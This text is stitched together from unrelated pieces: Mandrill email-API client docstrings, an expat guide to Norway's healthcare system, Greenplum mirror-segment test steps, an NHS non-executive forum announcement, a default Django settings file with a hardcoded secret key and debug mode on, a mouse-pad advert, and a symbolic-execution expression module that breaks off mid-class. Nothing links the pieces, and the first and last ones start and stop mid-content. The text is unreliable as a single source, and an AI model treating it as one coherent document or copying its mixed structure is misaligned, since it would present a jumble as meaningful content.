dkim.error (string): an error describing the DKIM record, or null if the record is correct verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('senders/add-domain', _params) def check_domain(self, domain): """Checks the SPF and DKIM settings for a domain. If you haven't already added this domain to your account, it will be added automatically. Args: domain (string): a domain name Returns: struct. information about the sender domain:: domain (string): the sender domain name created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format spf (struct): details about the domain's SPF record:: spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. 
spf.error (string): an error describing the spf record, or null if the record is correct dkim (struct): details about the domain's DKIM record:: dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. dkim.error (string): an error describing the DKIM record, or null if the record is correct verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('senders/check-domain', _params) def verify_domain(self, domain, mailbox): """Sends a verification email in order to verify ownership of a domain. Domain verification is an optional step to confirm ownership of a domain. Once a domain has been verified in a Mandrill account, other accounts may not have their messages signed by that domain unless they also verify the domain. This prevents other Mandrill accounts from sending mail signed by your domain. Args: domain (string): a domain name at which you can receive email mailbox (string): a mailbox at the domain where the verification email should be sent Returns: struct. 
information about the verification that was sent:: status (string): "sent" indicates that the verification has been sent, "already_verified" indicates that the domain has already been verified with your account domain (string): the domain name you provided email (string): the email address the verification email was sent to Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'domain': domain, 'mailbox': mailbox} return self.master.call('senders/verify-domain', _params) def info(self, address): """Return more detailed information about a single sender, including aggregates of recent stats Args: address (string): the email address of the sender Returns: struct. the detailed information on the sender:: address (string): the sender's email address created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format sent (integer): the total number of messages sent by this sender hard_bounces (integer): the total number of hard bounces by messages by this sender soft_bounces (integer): the total number of soft bounces by messages by this sender rejects (integer): the total number of rejected messages by this sender complaints (integer): the total number of spam complaints received for messages by this sender unsubs (integer): the total number of unsubscribe requests received for messages by this sender opens (integer): the total number of times messages by this sender have been opened clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked stats (struct): an aggregate summary of the sender's sending stats:: stats.today (struct): stats for this sender so far today:: stats.today.sent (integer): the number of emails sent for this sender so far today stats.today.hard_bounces (integer): the number of emails hard bounced for this sender so far today stats.today.soft_bounces 
(integer): the number of emails soft bounced for this sender so far today stats.today.rejects (integer): the number of emails rejected for sending this sender so far today stats.today.complaints (integer): the number of spam complaints for this sender so far today stats.today.unsubs (integer): the number of unsubscribes for this sender so far today stats.today.opens (integer): the number of times emails have been opened for this sender so far today stats.today.unique_opens (integer): the number of unique opens for emails sent for this sender so far today stats.today.clicks (integer): the number of URLs that have been clicked for this sender so far today stats.today.unique_clicks (integer): the number of unique clicks for emails sent for this sender so far today stats.last_7_days (struct): stats for this sender in the last 7 days:: stats.last_7_days.sent (integer): the number of emails sent for this sender in the last 7 days stats.last_7_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 7 days stats.last_7_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 7 days stats.last_7_days.rejects (integer): the number of emails rejected for sending this sender in the last 7 days stats.last_7_days.complaints (integer): the number of spam complaints for this sender in the last 7 days stats.last_7_days.unsubs (integer): the number of unsubscribes for this sender in the last 7 days stats.last_7_days.opens (integer): the number of times emails have been opened for this sender in the last 7 days stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 7 days stats.last_7_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 7 days stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 7 days stats.last_30_days (struct): stats for this sender in the 
last 30 days:: stats.last_30_days.sent (integer): the number of emails sent for this sender in the last 30 days stats.last_30_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 30 days stats.last_30_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 30 days stats.last_30_days.rejects (integer): the number of emails rejected for sending this sender in the last 30 days stats.last_30_days.complaints (integer): the number of spam complaints for this sender in the last 30 days stats.last_30_days.unsubs (integer): the number of unsubscribes for this sender in the last 30 days stats.last_30_days.opens (integer): the number of times emails have been opened for this sender in the last 30 days stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 30 days stats.last_30_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 30 days stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 30 days stats.last_60_days (struct): stats for this sender in the last 60 days:: stats.last_60_days.sent (integer): the number of emails sent for this sender in the last 60 days stats.last_60_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 60 days stats.last_60_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 60 days stats.last_60_days.rejects (integer): the number of emails rejected for sending this sender in the last 60 days stats.last_60_days.complaints (integer): the number of spam complaints for this sender in the last 60 days stats.last_60_days.unsubs (integer): the number of unsubscribes for this sender in the last 60 days stats.last_60_days.opens (integer): the number of times emails have been opened for this sender in the last 60 days stats.last_60_days.unique_opens 
(integer): the number of unique opens for emails sent for this sender in the last 60 days stats.last_60_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 60 days stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 60 days stats.last_90_days (struct): stats for this sender in the last 90 days:: stats.last_90_days.sent (integer): the number of emails sent for this sender in the last 90 days stats.last_90_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 90 days stats.last_90_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 90 days stats.last_90_days.rejects (integer): the number of emails rejected for sending this sender in the last 90 days stats.last_90_days.complaints (integer): the number of spam complaints for this sender in the last 90 days stats.last_90_days.unsubs (integer): the number of unsubscribes for this sender in the last 90 days stats.last_90_days.opens (integer): the number of times emails have been opened for this sender in the last 90 days stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 90 days stats.last_90_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 90 days stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 90 days Raises: UnknownSenderError: The requested sender does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'address': address} return self.master.call('senders/info', _params) def time_series(self, address): """Return the recent history (hourly stats for the last 30 days) for a sender Args: address (string): the email address of the sender Returns: array. 
the array of history information:: [] (struct): the stats for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent during the hour [].hard_bounces (integer): the number of emails that hard bounced during the hour [].soft_bounces (integer): the number of emails that soft bounced during the hour [].rejects (integer): the number of emails that were rejected during the hour [].complaints (integer): the number of spam complaints received during the hour [].opens (integer): the number of emails opened during the hour [].unique_opens (integer): the number of unique opens generated by messages sent during the hour [].clicks (integer): the number of tracked URLs clicked during the hour [].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour Raises: UnknownSenderError: The requested sender does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'address': address} return self.master.call('senders/time-series', _params) class Metadata(object): def __init__(self, master): self.master = master def list(self, ): """Get the list of custom metadata fields indexed for the account. Returns: array. the custom metadata fields for the account:: [] (struct): the individual custom metadata field info:: [].name (string): the unique identifier of the metadata field to update [].state (string): the current state of the metadata field, one of "active", "delete", or "index" [].view_template (string): Mustache template to control how the metadata is rendered in your activity log Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('metadata/list', _params) def add(self, name, view_template=None): """Add a new custom metadata field to be indexed for the account. 
Args: name (string): a unique identifier for the metadata field view_template (string): optional Mustache template to control how the metadata is rendered in your activity log Returns: struct. the information saved about the new metadata field:: name (string): the unique identifier of the metadata field to update state (string): the current state of the metadata field, one of "active", "delete", or "index" view_template (string): Mustache template to control how the metadata is rendered in your activity log Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key MetadataFieldLimitError: Custom metadata field limit reached. Error: A general Mandrill error has occurred """ _params = {'name': name, 'view_template': view_template} return self.master.call('metadata/add', _params) def update(self, name, view_template): """Update an existing custom metadata field. Args: name (string): the unique identifier of the metadata field to update view_template (string): optional Mustache template to control how the metadata is rendered in your activity log Returns: struct. the information for the updated metadata field:: name (string): the unique identifier of the metadata field to update state (string): the current state of the metadata field, one of "active", "delete", or "index" view_template (string): Mustache template to control how the metadata is rendered in your activity log Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownMetadataFieldError: The provided metadata field name does not exist. Error: A general Mandrill error has occurred """ _params = {'name': name, 'view_template': view_template} return self.master.call('metadata/update', _params) def delete(self, name): """Delete an existing custom metadata field. Deletion isn't instataneous, and /metadata/list will continue to return the field until the asynchronous deletion process is complete. 
Args: name (string): the unique identifier of the metadata field to update Returns: struct. the information for the deleted metadata field:: name (string): the unique identifier of the metadata field to update state (string): the current state of the metadata field, one of "active", "delete", or "index" view_template (string): Mustache template to control how the metadata is rendered in your activity log Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownMetadataFieldError: The provided metadata field name does not exist. Error: A general Mandrill error has occurred """ _params = {'name': name} return self.master.call('metadata/delete', _params)
About 35% of Norway’s state budget goes into its health and social welfare system; hence, citizens are assured of financial support during illness, old age and unemployment. The healthcare system in Norway has both public and private medical services. The Norwegian government finances the public health service. There are public medical clinics in communities. Most communities also have first aid stations (legevakt). Residents first set up an appointment with their general practitioner, who will then refer the patient to a specialist. According to Statistics Norway, "the life expectancy is 77 for males and 82 for females. After World War II, tuberculosis and other communicable diseases claimed the most number of lives." If you have an existing health insurance policy before moving, confirm with the medical insurance company that your coverage is valid in Norway, and whether emergency costs such as medical evacuation and hospital expenses will be taken care of. Expats can obtain health insurance in Norway through their tax deductions to the Norwegian Social Insurance Scheme. As soon as your social security number (fødselnummer) is issued, Norwegian Labor & Welfare (NAV) will send your health card with a letter indicating that you are assigned to a particular general practitioner or doctor for future consultations and treatments. Take note that you must find a new doctor on your own, and you may only change doctors twice a year. Public healthcare in Norway is run by regional health agencies. Medical facilities are of a superior quality, and most doctors can speak English. However, emergency cases in remote areas may involve long journeys, especially if the patient has to be transported via ferry across fjords. Most treatments, in-patient care and medication cost nothing except for the non-refundable consultation fee. A specialist will charge a higher amount than a general practitioner, but the fee is typically within the 100 NOK range. 
You have to buy your own medicine unless the recommended medication is on a blue prescription (for recurring conditions). However, you only need to pay 36% of the total cost, with a maximum of 360 NOK.
from gppylib.commands.base import Command, ExecutionError, REMOTE, WorkerPool
from gppylib.db import dbconn
from gppylib.gparray import GpArray
from gppylib.test.behave_utils.utils import run_gpcommand, getRows
import platform


@given('the information of a "{seg}" segment on a remote host is saved')
@when('the information of a "{seg}" segment on a remote host is saved')
@then('the information of a "{seg}" segment on a remote host is saved')
def impl(context, seg):
    # Record the dbid, hostname and data directory of the first mirror that
    # lives on a host other than the one running the test, for later steps.
    if seg == "mirror":
        gparray = GpArray.initFromCatalog(dbconn.DbURL())
        remote_mirrors = [db for db in gparray.getDbList()
                          if db.isSegmentMirror() and db.getSegmentHostName() != platform.node()]
        first = remote_mirrors[0]
        context.remote_mirror_segdbId = first.getSegmentDbId()
        context.remote_mirror_segdbname = first.getSegmentHostName()
        context.remote_mirror_datadir = first.getSegmentDataDirectory()


@given('user runs the command "{cmd}" with the saved mirror segment option')
@when('user runs the command "{cmd}" with the saved mirror segment option')
@then('user runs the command "{cmd}" with the saved mirror segment option')
def impl(context, cmd):
    # Append the saved mirror's dbid via the -s flag and run synchronously,
    # failing the step if the command exits non-zero.
    full_cmd = '%s -s %s' % (cmd, int(context.remote_mirror_segdbId))
    Command(name='user command', cmdStr=full_cmd).run(validateAfter=True)


@given('the saved mirror segment process is still running on that host')
@when('the saved mirror segment process is still running on that host')
@then('the saved mirror segment process is still running on that host')
def impl(context):
    # Look for the postgres process serving the saved data directory on the
    # remote mirror host; empty ps output means the process is gone.
    ps_cmd = """ps ux | grep "/bin/postgres \-D %s " | grep -v grep""" % (context.remote_mirror_datadir)
    checker = Command(name='user command', cmdStr=ps_cmd, ctxt=REMOTE,
                      remoteHost=context.remote_mirror_segdbname)
    checker.run(validateAfter=True)
    if not checker.get_results().stdout.strip():
        raise Exception('Mirror segment "%s" not active on "%s"' %
                        (context.remote_mirror_datadir, context.remote_mirror_segdbname))


@given('the saved mirror segment is marked down in config')
@when('the saved mirror segment is marked down in config')
@then('the saved mirror segment is marked down in config')
def impl(context):
    # gp_segment_configuration should show exactly one row with status 'd'
    # (down) for the saved mirror's host and dbid.
    qry = """select count(*) from gp_segment_configuration where status='d' and hostname='%s' and dbid=%s""" % (context.remote_mirror_segdbname, context.remote_mirror_segdbId)
    if getRows('template1', qry)[0][0] != 1:
        raise Exception('Expected mirror segment %s on host %s to be down, but it is running.' % (context.remote_mirror_datadir, context.remote_mirror_segdbname))
360 Assurance has been running a Quality Assurance Forum for senior management representatives from NHS provider trusts across the East Midlands and South Yorkshire for over 2 years. The forum has been an enormous success and has led to 360 Assurance winning the 2012 HFMA Governance Award and The Benchmarking Institute & The Best Practice Club 2013 Benchmarking Excellence Award. Building on this success we have established a forum specifically aimed at the Non-Executive Directors who sit on NHS Trust Quality Committees (Board Sub-Committees) within the East Midlands and South Yorkshire. The inaugural meeting of the Quality Committee NED Members’ Forum was held on March 11th 2014, at Trent Vineyard Conference Centre, Nottingham. Sir Stephen Moss talked to the Forum about his experiences at Mid Staffordshire NHS Foundation Trust between 2009 and 2012 and what can be learnt about quality assurance systems and processes. Good discussions occurred amongst attendees regarding the quality priorities for 2014-15 and the key risks on the horizon for Quality Committee members to be cognisant of. This was an excellent opportunity for networking and sharing ideas and good practice. If you would like further information about the forum or to book a place at future meetings please contact Elaine Dower (0115 8835313 or elaine.dower@360assurance.nhs.uk).
"""
Django settings for jbobau project.

Generated by 'django-admin startproject' using Django 1.10.1.

For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""

import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control -- rotate it and load
# it from the environment (or a secrets store) before any production deploy.
SECRET_KEY = 'm#8yqn^1gq&*879+o)e#k2ixg3)_bhv(i@j53g$*ay-tu6p&h%'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Host/domain names this site may serve; must be populated when DEBUG=False.
ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'home',  # project-local app
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'jbobau.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'jbobau.wsgi.application'


# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases

# SQLite file database in the project root (development default).
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/

STATIC_URL = '/static/'
Custom-designed personalized mouse pads with your company name or logo make a great gift and are a great way to keep your company name in front of customers. Personalized mouse pads are a great addition to any office. These mouse pads are a great gift, ideal for any occasion. Perfect for fund raisers, team logos, trade show giveaways, and school or club fundraisers. Call for discounts on 5 or more — we are glad to help.
"""Symbolic expression AST for the SMT layer.

Defines taintable ``Expression`` nodes: Bool/BitVec/Array sorts, their
variables, constants and operations, plus small helpers for taint queries.
"""

from functools import reduce
from ...exceptions import SmtlibError
import uuid
import re
import copy
from typing import Union, Type, Optional, Dict, Any


class ExpressionException(SmtlibError):
    """
    Expression exception
    """

    pass


class Expression:
    """ Abstract taintable Expression. """

    def __init__(self, taint: Union[tuple, frozenset] = ()):
        # Abstract: only concrete subclasses may be instantiated.
        if self.__class__ is Expression:
            raise TypeError
        super().__init__()
        # Taint is an immutable set of string labels carried by the node.
        self._taint = frozenset(taint)

    def __repr__(self):
        # "-T" suffix marks tainted expressions.
        return "<{:s} at {:x}{:s}>".format(type(self).__name__, id(self), self.taint and "-T" or "")

    @property
    def is_tainted(self):
        return len(self._taint) != 0

    @property
    def taint(self):
        return self._taint


def issymbolic(value) -> bool:
    """
    Helper to determine whether an object is symbolic (e.g checking
    if data read from memory is symbolic)

    :param object value: object to check
    :return: whether `value` is symbolic
    :rtype: bool
    """
    return isinstance(value, Expression)


def istainted(arg, taint=None):
    """
    Helper to determine whether an object is tainted.

    :param arg: a value or Expression
    :param taint: a regular expression matching a taint value (eg. 'IMPORTANT.*').
                  If None, this function checks for any taint value.
    """
    if not issymbolic(arg):
        return False
    if taint is None:
        return len(arg.taint) != 0
    for arg_taint in arg.taint:
        # Case-insensitive, DOTALL match of the taint pattern.
        m = re.match(taint, arg_taint, re.DOTALL | re.IGNORECASE)
        if m:
            return True
    return False


def get_taints(arg, taint=None):
    """
    Generator over an object's taint labels, optionally filtered.

    :param arg: a value or Expression
    :param taint: a regular expression matching a taint value (eg. 'IMPORTANT.*').
                  If None, all taint values are yielded.
    """
    if not issymbolic(arg):
        # Concrete values carry no taint.
        return
    for arg_taint in arg.taint:
        if taint is not None:
            m = re.match(taint, arg_taint, re.DOTALL | re.IGNORECASE)
            if m:
                yield arg_taint
        else:
            yield arg_taint
    return


def taint_with(arg, *taints, value_bits=256, index_bits=256):
    """
    Return `arg` carrying the given taint labels.

    :param arg: a value or Expression
    :param taints: taint labels to attach
    :param value_bits: width used when promoting a concrete int to a BitVec
    :param index_bits: accepted for symmetry; NOTE(review): currently unused here

    Concrete ints are promoted to a tainted BitVecConstant; variables are
    wrapped in a (var + 0) operation so the variable itself stays untainted;
    other expressions are shallow-copied and their taint set extended.
    """
    tainted_fset = frozenset(tuple(taints))
    if not issymbolic(arg):
        if isinstance(arg, int):
            arg = BitVecConstant(value_bits, arg)
            arg._taint = tainted_fset
        else:
            raise ValueError("type not supported")

    else:
        if isinstance(arg, BitVecVariable):
            # Variables are immutable/uncopyable: taint an equivalent expression instead.
            arg = arg + BitVecConstant(value_bits, 0, taint=tainted_fset)
        else:
            arg = copy.copy(arg)
            arg._taint |= tainted_fset

    return arg


class Variable(Expression):
    """Abstract named symbolic variable (free symbol)."""

    def __init__(self, name: str, *args, **kwargs):
        if self.__class__ is Variable:
            raise TypeError
        # SMT-LIB symbol names may not contain spaces.
        assert " " not in name
        super().__init__(*args, **kwargs)
        self._name = name

    @property
    def declaration(self):
        # Overridden by concrete sorts to return an SMT-LIB declare-fun.
        pass

    @property
    def name(self):
        return self._name

    # NOTE(review): copy.copy() calls __copy__() with no extra argument, so the
    # `memo` parameter here is unusual (it matches __deepcopy__'s signature).
    # Both hooks exist only to forbid copying.
    def __copy__(self, memo):
        raise ExpressionException("Copying of Variables is not allowed.")

    def __deepcopy__(self, memo):
        raise ExpressionException("Copying of Variables is not allowed.")

    def __repr__(self):
        return "<{:s}({:s}) at {:x}>".format(type(self).__name__, self.name, id(self))


class Constant(Expression):
    """Abstract literal value node."""

    def __init__(self, value: Union[bool, int], *args, **kwargs):
        if self.__class__ is Constant:
            raise TypeError
        super().__init__(*args, **kwargs)
        self._value = value

    @property
    def value(self):
        return self._value


class Operation(Expression):
    """Abstract n-ary operation over Expression operands."""

    def __init__(self, *operands, **kwargs):
        if self.__class__ is Operation:
            raise TypeError
        # assert len(operands) > 0
        # assert all(isinstance(x, Expression) for x in operands)
        self._operands = operands

        # If taint was not forced by a keyword argument, calculate default
        # as the union of the operands' taints.
        if "taint" not in kwargs:
            kwargs["taint"] = reduce(lambda x, y: x.union(y.taint), operands, frozenset())

        super().__init__(**kwargs)

    @property
    def operands(self):
        return self._operands


###############################################################################
# Booleans
class Bool(Expression):
    """Boolean-sorted expression; operators build Bool* operation nodes."""

    def __init__(self, *operands, **kwargs):
        super().__init__(*operands, **kwargs)

    def cast(self, value: Union[int, bool], **kwargs) -> Union["BoolConstant", "Bool"]:
        # Pass Bool expressions through; wrap anything else as a constant.
        if isinstance(value, Bool):
            return value
        return BoolConstant(bool(value), **kwargs)

    def __cmp__(self, *args):
        raise NotImplementedError("CMP for Bool")

    def __invert__(self):
        return BoolNot(self)

    # Note: == builds a symbolic BoolEqual node rather than returning a bool,
    # so identity-based __hash__ is kept explicitly below.
    def __eq__(self, other):
        return BoolEqual(self, self.cast(other))

    def __hash__(self):
        return object.__hash__(self)

    def __ne__(self, other):
        return BoolNot(self == self.cast(other))

    def __and__(self, other):
        return BoolAnd(self, self.cast(other))

    def __or__(self, other):
        return BoolOr(self, self.cast(other))

    def __xor__(self, other):
        return BoolXor(self, self.cast(other))

    def __rand__(self, other):
        return BoolAnd(self.cast(other), self)

    def __ror__(self, other):
        return BoolOr(self.cast(other), self)

    def __rxor__(self, other):
        return BoolXor(self.cast(other), self)

    def __bool__(self):
        # A symbolic Bool has no concrete truth value; force callers to solve it.
        raise NotImplementedError("__bool__ for Bool")


class BoolVariable(Bool, Variable):
    def __init__(self, name, *args, **kwargs):
        super().__init__(name, *args, **kwargs)

    @property
    def declaration(self):
        return f"(declare-fun {self.name} () Bool)"


class BoolConstant(Bool, Constant):
    def __init__(self, value: bool, *args, **kwargs):
        super().__init__(value, *args, **kwargs)

    def __bool__(self):
        # Concrete constants do have a truth value.
        return self.value


class BoolOperation(Operation, Bool):
    def __init__(self, *operands, **kwargs):
        super().__init__(*operands, **kwargs)


class BoolNot(BoolOperation):
    def __init__(self, value, **kwargs):
        super().__init__(value, **kwargs)


class BoolAnd(BoolOperation):
    def __init__(self, a, b, **kwargs):
        super().__init__(a, b, **kwargs)


class BoolOr(BoolOperation):
    def __init__(self, a: "Bool", b: "Bool", **kwargs):
        super().__init__(a, b, **kwargs)


class BoolXor(BoolOperation):
    def __init__(self, a, b, **kwargs):
        super().__init__(a, b, **kwargs)


class BoolITE(BoolOperation):
    """If-then-else over Bool values: operands are (cond, true, false)."""

    def __init__(self, cond: "Bool", true: "Bool", false: "Bool", **kwargs):
        super().__init__(cond, true, false, **kwargs)


class BitVec(Expression):
    """ This adds a bitsize to the Expression class """

    def __init__(self, size, *operands, **kwargs):
        super().__init__(*operands, **kwargs)
        self.size = size

    @property
    def mask(self):
        # All-ones value of this width.
        return (1 << self.size) - 1

    @property
    def signmask(self):
        # Just the sign bit set.
        return 1 << (self.size - 1)

    def cast(
        self, value: Union["BitVec", str, int, bytes], **kwargs
    ) -> Union["BitVecConstant", "BitVec"]:
        """Coerce `value` to a BitVec of this expression's width."""
        if isinstance(value, BitVec):
            assert value.size == self.size
            return value
        if isinstance(value, (str, bytes)) and len(value) == 1:
            value = ord(value)
        # Try to support not Integral types that can be casted to int
        if not isinstance(value, int):
            value = int(value)
        # FIXME? Assert it fits in the representation
        return BitVecConstant(self.size, value, **kwargs)

    def __add__(self, other):
        return BitVecAdd(self, self.cast(other))

    def __sub__(self, other):
        return BitVecSub(self, self.cast(other))

    def __mul__(self, other):
        return BitVecMul(self, self.cast(other))

    def __mod__(self, other):
        return BitVecMod(self, self.cast(other))

    # object.__divmod__(self, other)
    # object.__pow__(self, other[, modulo])

    def __lshift__(self, other):
        return BitVecShiftLeft(self, self.cast(other))

    def __rshift__(self, other):
        return BitVecShiftRight(self, self.cast(other))

    def __and__(self, other):
        return BitVecAnd(self, self.cast(other))

    def __xor__(self, other):
        return BitVecXor(self, self.cast(other))

    def __or__(self, other):
        return BitVecOr(self, self.cast(other))

    # The division operator (/) is implemented by these methods. The
    # __truediv__() method is used when __future__.division is in effect,
    # otherwise __div__() is used. If only one of these two methods is
    # defined, the object will not support division in the alternate context;
    # TypeError will be raised instead.
    def __div__(self, other):
        return BitVecDiv(self, self.cast(other))

    def __truediv__(self, other):
        return BitVecDiv(self, self.cast(other))

    def __floordiv__(self, other):
        return self / other

    # These methods are called to implement the binary arithmetic operations
    # (+, -, *, /, %, divmod(), pow(), **, <<, >>, &, ^, |) with reflected
    # (swapped) operands. They are only called if the left operand does not
    # support the corresponding operation and the operands are of different
    # types. For instance, to evaluate x - y where y has an __rsub__()
    # method, y.__rsub__(x) is called if x.__sub__(y) returns NotImplemented.
    def __radd__(self, other):
        return BitVecAdd(self.cast(other), self)

    def __rsub__(self, other):
        return BitVecSub(self.cast(other), self)

    def __rmul__(self, other):
        return BitVecMul(self.cast(other), self)

    def __rmod__(self, other):
        return BitVecMod(self.cast(other), self)

    def __rtruediv__(self, other):
        return BitVecDiv(self.cast(other), self)

    def __rdiv__(self, other):
        return BitVecDiv(self.cast(other), self)

    # object.__rdivmod__(self, other)
    # object.__rpow__(self, other)

    def __rlshift__(self, other):
        return BitVecShiftLeft(self.cast(other), self)

    def __rrshift__(self, other):
        return BitVecShiftRight(self.cast(other), self)

    def __rand__(self, other):
        return BitVecAnd(self.cast(other), self)

    def __rxor__(self, other):
        return BitVecXor(self.cast(other), self)

    def __ror__(self, other):
        return BitVecOr(self.cast(other), self)

    def __invert__(self):
        # Bitwise NOT as XOR with the all-ones mask.
        return BitVecXor(self, self.cast(self.mask))

    # These are the so-called "rich comparison" methods, called for comparison
    # operators in preference to __cmp__():
    #   x<y  -> x.__lt__(y),  x<=y -> x.__le__(y),  x==y -> x.__eq__(y),
    #   x!=y -> x.__ne__(y),  x>y  -> x.__gt__(y),  x>=y -> x.__ge__(y).
    # Signed comparisons by default; unsigned variants are named methods below.
    def __lt__(self, other):
        return LessThan(self, self.cast(other))

    def __le__(self, other):
        return LessOrEqual(self, self.cast(other))

    def __eq__(self, other):
        return BoolEqual(self, self.cast(other))

    def __hash__(self):
        return object.__hash__(self)

    def __ne__(self, other):
        return BoolNot(BoolEqual(self, self.cast(other)))

    def __gt__(self, other):
        return GreaterThan(self, self.cast(other))

    def __ge__(self, other):
        return GreaterOrEqual(self, self.cast(other))

    def __neg__(self):
        return BitVecNeg(self)

    # Unsigned comparisons
    def ugt(self, other):
        return UnsignedGreaterThan(self, self.cast(other))

    def uge(self, other):
        return UnsignedGreaterOrEqual(self, self.cast(other))

    def ult(self, other):
        return UnsignedLessThan(self, self.cast(other))

    def ule(self, other):
        return UnsignedLessOrEqual(self, self.cast(other))

    def udiv(self, other):
        return BitVecUnsignedDiv(self, self.cast(other))

    def rudiv(self, other):
        return BitVecUnsignedDiv(self.cast(other), self)

    def sdiv(self, other):
        return BitVecDiv(self, self.cast(other))

    def rsdiv(self, other):
        return BitVecDiv(self.cast(other), self)

    def srem(self, other):
        return BitVecRem(self, self.cast(other))

    def rsrem(self, other):
        return BitVecRem(self.cast(other), self)

    def urem(self, other):
        return BitVecUnsignedRem(self, self.cast(other))

    def rurem(self, other):
        return BitVecUnsignedRem(self.cast(other), self)

    def sar(self, other):
        # Arithmetic (sign-preserving) shift right.
        return BitVecArithmeticShiftRight(self, self.cast(other))

    def sal(self, other):
        return BitVecArithmeticShiftLeft(self, self.cast(other))

    def Bool(self):
        # Truthiness as a symbolic predicate: nonzero test.
        return self != 0


class BitVecVariable(BitVec, Variable):
